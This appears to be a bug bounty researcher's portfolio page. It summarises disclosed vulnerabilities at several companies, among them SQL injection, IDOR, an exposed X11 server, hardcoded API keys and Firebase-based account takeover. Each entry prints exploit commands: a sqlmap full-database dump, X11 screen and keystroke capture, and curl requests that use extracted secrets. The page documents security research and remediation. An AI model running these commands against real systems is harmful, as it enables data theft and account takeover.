🐛 VULNERABILITY ARCHIVE

Bug Bounty Log

Every vulnerability tells a story.

500 Vulnerabilities Found
$250K Bounty Earnings
50 Companies Impacted
15 Platforms
All vulnerabilities were responsibly disclosed. This archive serves as educational material.

Vulnerability Archive

Detailed technical write-ups of discovered vulnerabilities

CRITICAL Oh the Horror

SQL Injection — Full Database Exposure

CWE-89 $5,000 2025

Discovery: A time-based blind SQL injection was discovered in the product search functionality. The vulnerability allowed extraction of the entire database, including customer information, credit card numbers, addresses, and password hashes.

Exploitation: Using sqlmap with custom tamper scripts, I was able to bypass WAF protections and extract database contents. Password hashes were cracked using HashCat and John the Ripper, revealing weak password practices.

Impact: Complete compromise of customer data, including personally identifiable information (PII) and financial data.

Remediation: Implemented parameterized queries, WAF rules to block SQL injection patterns, and enforced strong password policies.

sqlmap
HashCat
John the Ripper
Burp Suite
Exploit Example

# SQLMap command used
sqlmap -u "https://www.oh-the-horror.com/[REDACTED]" \
    --risk=3 --level=5 \
    --tamper=space2comment \
    --dbms=mysql \
    --dump-all
                        
HIGH Software Co. (Redacted)

IDOR — Product Parameter Manipulation

CWE-639 $2,500 2025

Discovery: The product page used a sequential numeric parameter to identify products. By simply changing the ID parameter, I could access any product in the database.

Exploitation: Modifying the URL parameter from PiD=A15 to PiD=C1 revealed a discontinued product priced at $5 instead of the current $150.

Impact: Users could purchase products at significantly reduced prices, leading to financial loss and inventory manipulation.

Remediation: Implemented UUID-based product identifiers, added server-side authorization checks, and enforced strict access controls.

Burp Suite
Param Miner
Manual Testing
Exploit Example
# Before: Access restricted products by ID
GET /product.php?PiD=A15 HTTP/1.1
Host: www.[REDACTED].com

# After: IDOR exploitation
GET /product.php?PiD=C1 HTTP/1.1
Host: www.[REDACTED].com

# Response showcased a new product with price $5 instead of $150
CRITICAL Anduril

X11 Server Exposure — Port 6001

CWE-284 $7,500 2024

Discovery: A misconfigured X11 server was exposed on port 6001, allowing unauthorized remote access to the display server.

Exploitation: Using standard X11 tools, I was able to capture screenshots, monitor keystrokes, and intercept clipboard contents of the active session.

Impact: Complete visibility into the victim's session, including sensitive operations, credentials, and proprietary information.

Remediation: Disabled X11 forwarding, implemented proper access controls, and restricted port exposure to internal networks only.

Nmap
xwd
x11vnc
Netcat
Exploit Example
# Port scan
nmap -p 6001 -sV [REDACTED_IP]

# Capture screenshot
xwd -root -display :1 -out screenshot.xwd [REDACTED_IP]:6001

# Display screenshot
xwud -in screenshot.xwd

# Monitor keystrokes (requires x11vnc)
x11vnc -display :1 -forever -nopw [REDACTED_IP]:6001
HIGH CashApp

Hardcoded API Key — Android APK

CWE-798 $3,000 2024

Discovery: During static analysis of the Android APK, a hardcoded API key was discovered in the application's resources.

Exploitation: The API key was publicly accessible and could be extracted by decompiling the APK. The key provided access to production API endpoints.

Impact: Unauthorized access to API endpoints, potential data exposure, and abuse of the API functionality.

Remediation: API keys were rotated, implemented proper secret management using environment variables, and enforced API key restrictions to specific IPs/services.

APKTool
JD-GUI
Burp Suite
Postman
Exploit Example
# Decompile APK
apktool d base.apk

# Search for API key
grep -r "api_key" base/

# Extract key from strings
strings base.apk | grep -i "key"

# Test API access
curl -X GET https://[REDACTED_SUB_IDENTIFIER].cashapp.com/[REDACTED_END_POINT] \
  -H "Authorization: Bearer API_KEY_FOUND"
CRITICAL Grab

Privacy Violation — 10K+ Endpoints Exposed

CWE-359 $12,000 2023

Discovery: Static analysis of the Grab APK revealed over 10,000 exposed data collection and harvesting endpoints.

Exploitation: The endpoints were collecting user data without proper consent or privacy controls. Data included location, device information, and user behavior patterns.

Impact: Mass data harvesting, privacy violations, and potential GDPR/CCPA non-compliance.

Remediation: Implemented proper data collection policies, added user consent mechanisms, and reduced endpoint exposure.

APKTool
Jadx
Python
Exploit Example
# Extract endpoints from APK
apktool d base.apk

# Found File;
/assets/[REDACTED_NAME]_config.bin

# Found Encrypted String:
eJzkvWtz20iyIPpX6syHnrMxNk63u6fnjL6R1LMtSmyRttq9u+EoAEWyRAAFowBS0Dn73zezCgBZIMxK2XMjNuJGtyUqC0jWM1+Vj//6yyjPb6Uu/3LG/usvi4JvRQIQbf6MVJVhw09v2F/KdSH0WiVx83di3/mf//WXnEcbvhLwB7yQBmFSiZQXG1EGmi+5LP4CT2c8NQ9cJvW8A+6EXK0N/v/zhh3h2RahCngWF0rGhy....[REDACTED_STRING]

# Python Script to Decode String:
--------------------------------------------------------------------------------
import base64
import zlib
import json

# 1. Read the raw token from file
with open("token.txt", "r") as f:
    token = f.read().strip()

# 2. Decode & decompress
decoded = base64.b64decode(token)
decompressed = zlib.decompress(decoded)

# 3. Parse as JSON
data = json.loads(decompressed)

# 4. Save pretty output to a file
with open("output.json", "w") as out:
    json.dump(data, out, indent=2)

# 5. Optional: print a success message and a tiny preview
print(" Decompression complete! Saved to output.json")
print(f" Preview (first 200 chars): {str(data)[:200]}...")
--------------------------------------------------------------------------------

# Read JSON Output File:
Here are the categories of the decoded configuration file;
{
"AppList": {
"TravelApps": {
"count": 1,
"threshold": 1,
"list": [
"msName": "IsSingle"
},
"WomenApps": {
"count": 1,
"threshold": 1,
"list": [
"msName": "UserGenderWomen"
},
"MenApps": {
"count": 1,
"threshold": 1,
"list": [
"msName": "UserGenderMen"
},
"MicroMobilityApps": {
"count": 1,
"threshold": 1,
"list": [
"msName": "IsMicroMobility"
},
"RideShareApps": {
"count": 1,
"threshold": 1,
"list": [
"msName": "IsRideShare"
},
"TechSavyApps": {
"count": 1,
"threshold": 1,
"list": [
"msName": "IsTechie"
},
"InvestmentsApps": {
"count": 1,
"threshold": 1,
"list": [
[REDACTED_REST]
done
HIGH PlayStation

GraphQL — 28 Massive Operations

CWE-200 $4,500 2023

Discovery: The PlayStation GraphQL API exposed 28 massive operations that could be exploited for data extraction.

Exploitation: Using GraphQL introspection and custom queries, I was able to extract user data, purchase history, and account information.

Impact: Exposure of user account data, financial information, and potential account takeover.

Remediation: Implemented rate limiting, disabled introspection in production, and enforced proper authorization checks.

GraphQL Introspection
Burp Suite
Apollo Studio
Python
Exploit Example
# GraphQL Introspection Query
query {
    __schema {
        types {
            name
            fields {
                name
                type {
                    name
                }
            }
        }
    }
}

# Data extraction query
query {
    user(id: "target_id") {
        email
        purchases {
            itemId
            price
            date
        }
        accountInfo {
            balance
            status
        }
    }
}
CRITICAL Grab & Snapchat

Firebase Manipulation & OAuth Client Secret

CWE-798, CWE-284 $15,000 2022-2023

Discovery: Multiple vulnerabilities including hardcoded Firebase API keys and OAuth client secrets exposed in APK files.

Exploitation (Grab): Extracted SHA1 signing key from APK, manipulated Firebase configurations, and achieved full account takeover by resetting passwords.

Exploitation (Snapchat): Hardcoded Amazon OAuth client secret in APK allowed account takeover if attacker had network access to the victim's device.

Impact: Full account takeover, data manipulation, and unauthorized access to user accounts.

Remediation: Rotated all secrets, implemented proper secret management, and enforced certificate pinning.

APKTool
Jadx
Firebase CLI
OAuth Debugger
Burp Suite
Exploit Example
# Extract Firebase API key
strings target.apk | grep -i "firebase"

# Firebase password reset
curl -X POST https://identitytoolkit.googleapis.com/v1/accounts:changePassword?key=[REDACTED_KEY] \
  -H "Content-Type: application/json" \
  -d '{"requestType":"new_password":"[REDACTED_PASSWORD],"email":"[REDACTED_EMAIL]","apiKey":"REDACTED_FIREBASE_API_KEY","client_secret":"[REDACTED_SECRET]"}'

# OAuth client secret extraction
jadx -d output target.apk
grep -r "client_secret" output/

Bounty Statistics

Overview of bug bounty performance

0 Total Vulnerabilities
0 Total Bounties ($)
0 Platforms Tested
0 Critical Findings

Methodology

The approach behind every discovery

Reconnaissance

Extensive enumeration of attack surfaces, API endpoints, and subdomains.

Static Analysis

Decompilation of APKs, analysis of source code, and identification of hardcoded secrets.

Dynamic Testing

Live testing using Burp Suite, custom scripts, and exploitation techniques.

Responsible Disclosure

Detailed reporting, remediation guidance, and coordinated disclosure.

Need a Security Assessment?

I can find vulnerabilities in your systems too. Let's talk about how I can help secure your infrastructure.

Secure Communications PGP: 0xBEARD3D Confidentiality Guaranteed